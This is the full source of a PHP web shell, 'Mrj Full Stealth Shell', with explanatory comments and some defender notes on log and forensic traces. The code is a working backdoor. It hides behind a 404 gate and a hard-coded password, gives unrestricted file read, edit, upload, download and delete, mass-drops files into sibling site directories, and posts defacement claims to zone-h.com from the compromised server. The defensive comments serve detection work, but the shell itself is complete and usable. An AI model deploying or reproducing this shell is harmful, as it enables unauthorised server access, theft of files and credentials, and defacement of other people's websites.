mrj
<?php
// Runtime setup: error reporting is switched off and the execution time limit
// is removed, so failures in the operations below leave no PHP error output
// and long-running requests are not cut short. A session is opened to hold the
// login flag.
error_reporting(0);
set_time_limit(0);
session_start();
// Logout: destroys the session and redirects back to the gated entry URL.
if (isset($_GET['logout'])) {
session_destroy();
header("Location: ?access=mrj");
exit;
}
// Concealment gate: any request without the exact query parameter access=mrj
// gets a 404 status and no body, so the script looks like a missing page.
// Defender note: a file that exists on disk but returns 404, and whose response
// changes when `access=mrj` is in the query string, is a usable signal in web
// access logs and scanner output.
if (!isset($_GET['access']) || $_GET['access'] !== 'mrj') {
http_response_code(404);
exit;
}
// Password check: one hard-coded password compared with ===. Success sets
// $_SESSION['authenticated']; anything else prints a bare login form and stops.
// The literal password and the form markup are static strings that can be
// matched when sweeping a web root.
if (!isset($_SESSION['authenticated'])) {
if (isset($_POST['pass']) && $_POST['pass'] === 'Mrj') {
$_SESSION['authenticated'] = true;
} else {
echo '<form method="post"><input type="password" name="pass" placeholder="Password"><input type="submit" value="Login"></form>';
exit;
}
}
// Working directory: taken verbatim from the `path` query parameter, falling
// back to the script's own directory. It is not normalised or confined to any
// base directory, and every handler below appends a request-supplied name to
// it, so each operation reaches whatever the PHP process account can access.
$cwd = isset($_GET['path']) ? $_GET['path'] : getcwd();
// ==== File Manager Logic ====
// Delete handler (GET `del`): unlinks a file, or removes a directory with
// rmdir(), which only succeeds on an empty directory. Because this is a GET
// request, the deleted name appears in the access log query string.
if (isset($_GET['del'])) {
$target = $cwd . DIRECTORY_SEPARATOR . $_GET['del'];
if ((is_file($target) && unlink($target)) || (is_dir($target) && rmdir($target))) {
echo "Deleted ✅: " . htmlspecialchars($target) . "<br>";
} else {
echo "Failed ❌ to delete: " . htmlspecialchars($target) . "<br>";
}
}
// Rename handler (POST `rename_from` / `rename_to`): both names are appended
// to $cwd and passed to rename(). Nothing is printed when the source does not
// exist. The names travel in the POST body, so they are absent from standard
// access logs; only the `path` query parameter is recorded.
if (isset($_POST['rename_from']) && isset($_POST['rename_to'])) {
$from = $cwd . DIRECTORY_SEPARATOR . $_POST['rename_from'];
$to = $cwd . DIRECTORY_SEPARATOR . $_POST['rename_to'];
if (file_exists($from)) {
if (rename($from, $to)) {
echo "Renamed ✅: " . htmlspecialchars($from) . " ➔ " . htmlspecialchars($to) . "<br>";
} else {
echo "Failed ❌ to rename: " . htmlspecialchars($from) . "<br>";
}
}
}
// Create handler (POST `createfile`): writes the posted content to a new file
// name under $cwd with file_put_contents(), overwriting any existing file of
// that name. There is no restriction on extension or content, so this is the
// point where further server-side scripts can be written to disk.
// Defender note: files owned by the web server account appearing under the
// document root with recent mtimes are the forensic trace of this handler.
if (isset($_POST['createfile'])) {
$newfile = $cwd . DIRECTORY_SEPARATOR . $_POST['newfilename'];
if (file_put_contents($newfile, $_POST['newfilecontent']) !== false) {
echo "Created ✅: " . htmlspecialchars($newfile) . "<br>";
} else {
echo "Failed ❌ to create file: " . htmlspecialchars($newfile) . "<br>";
}
}
// Save handler (POST `savefile`): same write path as above, used by the edit
// form to replace the content of an existing file in place. File integrity
// monitoring on application source is what surfaces such modifications.
if (isset($_POST['savefile'])) {
$savefile = $cwd . DIRECTORY_SEPARATOR . $_POST['filename'];
if (file_put_contents($savefile, $_POST['filecontent']) !== false) {
echo "Saved ✅: " . htmlspecialchars($savefile) . "<br>";
} else {
echo "Failed ❌ to save file: " . htmlspecialchars($savefile) . "<br>";
}
}
// Edit view (GET `edit`): reads the named file and renders it, HTML-escaped,
// inside a form that posts back to the save handler. The request ends here
// whether or not the file exists.
if (isset($_GET['edit'])) {
$file = $cwd . DIRECTORY_SEPARATOR . $_GET['edit'];
if (is_file($file)) {
echo '<h3>Editing: ' . htmlspecialchars($file) . '</h3>';
echo '<form method="post">
<textarea name="filecontent" rows="20" cols="100">' . htmlspecialchars(file_get_contents($file)) . '</textarea><br>
<input type="hidden" name="filename" value="' . htmlspecialchars($_GET['edit']) . '">
<input type="submit" name="savefile" value="Save">
</form>';
}
exit;
}
// Read-only view (GET `view`): prints the file content HTML-escaped in a <pre>
// block. Together with an unrestricted `path`, this discloses any file the PHP
// process can read (configuration files, credentials, source code). The file
// name is in the query string and therefore in access logs.
if (isset($_GET['view'])) {
$file = $cwd . DIRECTORY_SEPARATOR . $_GET['view'];
if (is_file($file)) {
echo '<pre>' . htmlspecialchars(file_get_contents($file)) . '</pre>';
}
exit;
}
// Download handler (GET `download`): streams the named file back as an
// attachment with its detected MIME type and length, then exits. This is the
// exfiltration path: in access logs it shows up as a GET to this script with a
// `download` parameter and a response size matching the file taken.
// The check is file_exists(), which is also true for directories.
if (isset($_GET['download'])) {
$file = $cwd . DIRECTORY_SEPARATOR . $_GET['download'];
if (file_exists($file)) {
header('Content-Description: File Transfer');
header('Content-Type: ' . mime_content_type($file));
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Content-Length: ' . filesize($file));
// Discard anything already buffered so only the file bytes are sent.
ob_clean();
flush();
readfile($file);
exit;
} else {
echo "Download Failed ❌: File not found.<br>";
}
}
// Upload handler (multipart field `uploadfile`): moves the uploaded file into
// $cwd under the base name the client supplied. No check is made on extension,
// MIME type or size, so any file type lands wherever `path` points.
// Defender note: multipart POSTs to this script, followed by new files owned by
// the web server account, are the trace to correlate.
if (isset($_FILES['uploadfile'])) {
$destination = $cwd . DIRECTORY_SEPARATOR . basename($_FILES['uploadfile']['name']);
if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $destination)) {
echo "Uploaded ✅: " . htmlspecialchars($destination) . "<br>";
} else {
echo "Upload Failed ❌: " . htmlspecialchars($_FILES['uploadfile']['name']) . "<br>";
}
}
// Mass write handler (POST `massexploit`): writes one file, with the same name
// and the same content, into every immediate subdirectory of `masspath`. It
// does not recurse and does not write into `masspath` itself.
// Defender note: the resulting artefact is a set of byte-identical files with
// one name and near-identical mtimes spread across sibling directories (on
// shared hosting, typically neighbouring site roots). Searching by that file
// name or content hash scopes which directories were touched.
if (isset($_POST['massexploit'])) {
$filename = trim($_POST['massfilename']);
// Trailing slashes and backslashes are stripped before the directory check.
$targetPath = rtrim(trim($_POST['masspath']), "/\\");
$content = $_POST['masscontent'];
if (is_dir($targetPath)) {
$subdirs = scandir($targetPath);
foreach ($subdirs as $sub) {
if ($sub == '.' || $sub == '..') continue;
$fullsub = $targetPath . DIRECTORY_SEPARATOR . $sub;
// Only directories receive a copy; plain files at this level are skipped.
if (is_dir($fullsub)) {
$filePath = $fullsub . DIRECTORY_SEPARATOR . $filename;
// The result line echoes the path without HTML escaping, unlike the
// file-manager handlers above.
if (file_put_contents($filePath, $content) !== false) {
echo "Exploited ✅ " . $filePath . "<br>";
} else {
echo "Failed ❌ " . $filePath . "<br>";
}
}
}
} else {
echo "<b>Invalid target directory!</b><br>";
}
}
// ==== ZONE-H Notifier ====
// Submission handler (POST `zonenow`): prints links to the zone-h.org archive
// pages for the posted `defacer` name, then calls postzone() once per line of
// the `domains` field. `defacer` is interpolated into the HTML unescaped;
// `domains` is HTML-escaped before being split on newlines.
// Defender note: this makes the compromised web server itself issue the
// outbound requests, so they appear in egress and proxy logs with the server
// as the source address.
if (isset($_POST['zonenow'])) {
$defacer = $_POST['defacer'];
echo "<br><font color='red'>Archive</font> : <a href='http://zone-h.org/archive/notifier=$defacer' target='_blank'>http://zone-h.org/archive/notifier=$defacer</a>";
echo "<br><font color='red'>OnHold</font> : <a href='http://zone-h.org/archive/notifier=$defacer&published=0' target='_blank'>http://zone-h.org/archive/notifier=$defacer&published=0</a>";
foreach(explode("\n", htmlspecialchars($_POST['domains'])) as $domain) {
postzone(trim($domain), $_POST['defacer']);
}
echo "<br>";
}
/**
 * Sends one POST request to the zone-h.com single-notification endpoint and
 * echoes a SUCCESS or FAILED line depending on whether the response body
 * contains the expected "OK" marker.
 *
 * Both values are placed into the POST body by plain string interpolation,
 * with no URL encoding. No timeout option is set on the handle, and the
 * request goes over plain HTTP.
 *
 * Defender note: outbound HTTP from a web server to www.zone-h.com is an
 * egress indicator that a defacement has been carried out and is being
 * reported from that host.
 *
 * @param string $url     One trimmed line of the posted `domains` field
 *                        (already HTML-escaped by the caller).
 * @param string $defacer Raw value of the posted `defacer` field.
 * @return void Output is echoed; nothing is returned.
 */
function postzone($url, $defacer) {
$ch = curl_init();
// Return the response body as a string instead of printing it.
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, "http://www.zone-h.com/notify/single");
curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$defacer&domain1=$url&hackmode=1&reason=1");
$res = curl_exec ($ch);
// Success is inferred from one fixed HTML fragment in the response body.
if (preg_match ("/color=\"red\">OK<\/font><\/li>/", $res)) {
echo "<br><font color='red'>Zone</font><font color='#fff'>-H</font> --> <font color='gold'>$url</font> : <span style='color:green'>SUCCESS</span>";
} else {
echo "<br><font color='red'>Zone</font><font color='#fff'>-H</font> --> <font color='gold'>$url</font> : <span style='color:red'>FAILED</span>";
}
curl_close($ch);
}
?>
<!-- ==== STYLES ==== -->
<style>
body {
font-family: monospace;
background: #111;
color: #ddd;
margin: 0;
padding: 0;
}
a {
color: #0bf;
}
table {
border-collapse: collapse;
width: 100%;
}
td, th {
padding: 5px;
}
input[type=text], textarea {
background: #222;
color: #0f0;
border: 1px solid #555;
padding: 5px;
font-size: 14px;
width: 100%;
box-sizing: border-box;
}
input[type=submit], input[type=file] {
padding: 5px 10px;
background: #333;
color: white;
border: 1px solid #666;
cursor: pointer;
margin-top: 5px;
}
input[type=submit]:hover {
background: #555;
}
textarea {
resize: vertical;
}
.header {
padding: 10px;
background: #222;
position: relative;
}
.logout {
position: absolute;
top: 10px;
right: 10px;
}
.container {
display: flex;
justify-content: space-between;
gap: 20px;
margin: 20px;
}
.leftbox, .rightbox {
width: 48%;
background: #1a1a1a;
padding: 15px;
border: 1px solid #333;
border-radius: 8px;
}
form {
margin-bottom: 15px;
}
.active-folder {
background: #ff0;
color: #000;
font-weight: bold;
}
</style>
<!-- ==== HTML UI ==== -->
<div class="header">
<h2>Mrj Full Stealth Shell</h2>
<div class="logout">
<form method="get">
<input type="hidden" name="access" value="mrj">
<input type="hidden" name="logout" value="1">
<input type="submit" value="Logout">
</form>
</div>
</div>
<form method="get" style="margin:10px;">
<input type="hidden" name="access" value="mrj">
<input type="text" name="path" value="<?=htmlspecialchars($cwd)?>" size="80">
<input type="submit" value="GO">
</form>
<form method="post" style="margin:10px;">
<b>Make File:</b>
<div style="display:flex; gap:10px; margin-top:5px;">
<textarea name="newfilecontent" rows="1" placeholder="File content" style="flex:1;"></textarea>
<input type="text" name="newfilename" placeholder="Filename.php" style="width:200px;">
<input type="submit" name="createfile" value="Create">
</div>
</form>
<a href="?access=mrj&path=<?=urlencode(dirname($cwd))?>">[Parent Directory]</a><br><br>
<table border="1"><tr><th>Name</th><th>Type</th><th>Size</th><th>Actions</th></tr>
<?php
// Directory listing: enumerates $cwd and renders one table row per entry,
// directories first, then files. Every link carries access=mrj and the current
// `path`, so browsing shows up in access logs as a run of GET requests to this
// script with a changing `path` value.
$allItems = scandir($cwd);
$dirs = $files = [];
foreach ($allItems as $file) {
if ($file == '.' || $file == '..') continue;
$fullpath = $cwd . DIRECTORY_SEPARATOR . $file;
if (is_dir($fullpath)) $dirs[] = $file; else $files[] = $file;
}
foreach (array_merge($dirs, $files) as $file) {
$fullpath = $cwd . DIRECTORY_SEPARATOR . $file;
$isDir = is_dir($fullpath);
// NOTE(review): '.' and '..' were skipped above, so this comparison looks like
// it can only match an entry that resolves back to $cwd (e.g. a symlink).
$highlight = ($isDir && realpath($fullpath) == realpath($cwd)) ? 'class="active-folder"' : '';
echo '<tr><td '.$highlight.'>';
echo $isDir ? "<a href='?access=mrj&path=".urlencode($fullpath)."'>".htmlspecialchars($file)."</a>" : htmlspecialchars($file);
echo "</td><td>".($isDir ? "DIR" : "FILE")."</td><td>".($isDir ? "-" : filesize($fullpath))."</td><td>";
// View, Edit and Download are offered for files only; Delete and Rename are
// offered for every entry.
if (!$isDir) {
echo "<a href='?access=mrj&path=".urlencode($cwd)."&view=".urlencode($file)."'>View</a> | ";
echo "<a href='?access=mrj&path=".urlencode($cwd)."&edit=".urlencode($file)."'>Edit</a> | ";
echo "<a href='?access=mrj&path=".urlencode($cwd)."&download=".urlencode($file)."'>Download</a> | ";
}
echo "<a href='?access=mrj&path=".urlencode($cwd)."&del=".urlencode($file)."' onclick='return confirm(\"Delete?\")'>Delete</a> | ";
// The rename form has no action attribute, so it posts to the current URL and
// the target directory comes from the `path` already in the query string.
echo "<form method='post' style='display:inline'>
<input type='hidden' name='rename_from' value='".htmlspecialchars($file)."'>
<input type='text' name='rename_to' value='".htmlspecialchars($file)."' size='10'>
<input type='submit' value='Rename'></form></td></tr>";
}
?>
</table>
<!-- ==== Mass Dropper + Zone-H Notifier ==== -->
<div class="container">
<div class="leftbox">
<form method="post" enctype="multipart/form-data">
<input type="file" name="uploadfile"><br>
<input type="submit" value="Upload File">
</form>
<form method="post">
<b>Mass Folder Exploiter:</b><br><br>
<label>Filename:</label>
<input type="text" name="massfilename" value="mrj.txt"><br><br>
<label>Path / Directory:</label>
<input type="text" name="masspath" placeholder="/home/public_html/"><br><br>
<label>File Content:</label>
<textarea name="masscontent" rows="5" placeholder="Mass file content"></textarea><br><br>
<input type="submit" name="massexploit" value="Submit">
</form>
</div>
<div class="rightbox">
<form method="post">
<b>Zone H Notifier:</b><br><br>
<label>Defacer Name:</label>
<input type="text" name="defacer" value="Mrj Haxcore"><br><br>
<label>Defaced URLs:</label>
<textarea name="domains" rows="5" placeholder="http://target.com/def.htm http://target.com/def.txt"></textarea><br><br>
<input type="submit" name="zonenow" value="Notify">
</form>
</div>
</div>
